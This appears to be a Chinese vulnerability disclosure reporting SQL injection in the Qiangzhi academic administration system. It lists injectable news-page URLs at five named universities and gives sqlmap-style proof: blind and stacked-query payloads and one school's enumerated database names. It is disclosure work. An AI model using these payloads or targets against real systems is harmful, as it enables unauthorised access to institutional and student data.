### 简要描述:
强智科技教务系统存在SQL注入漏洞,多校中枪……
### 详细说明:
这个算是CMS吧?
中枪学校及注入点
湖南商学院:http://jwgl.hnuc.edu.cn/Public/ShowGGTZ.asp?GGTZID=317【这里】
北京城市学院:http://114.255.66.248/jiaowu/Public/ShowGGTZ.asp?GGTZID=218【这里】
焦作大学:http://jw.jzu.cn/jiaowu/Public/ShowGGTZ.asp?GGTZID=1155【这里】
河北交通职业技术学院:http://219.148.49.53/jiaowu/Public/ShowGGTZ.asp?GGTZID=223【这里】
湖北经济学院法商学院:http://218.197.80.9/jiaowu_fsxy/Public/ShowGGTZ.asp?GGTZID=105【这里】
使用智强科技教务系统的学校有很多,估计还有,懒得查了……
问题就出在这款教务系统带的新闻功能上!在新闻的URL中GGTZID字段没过滤,然后数据库就直接暴漏啦……
### 漏洞证明:
以湖南商学院为例曝个数据库名吧:
```
Place: GET
Parameter: GGTZID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GGTZID=317 AND 7648=7648
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: GGTZID=317; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: GGTZID=317 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] jiaowusxy
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
```
教务系统这东西,点到为止,我不继续深入了……
暂无评论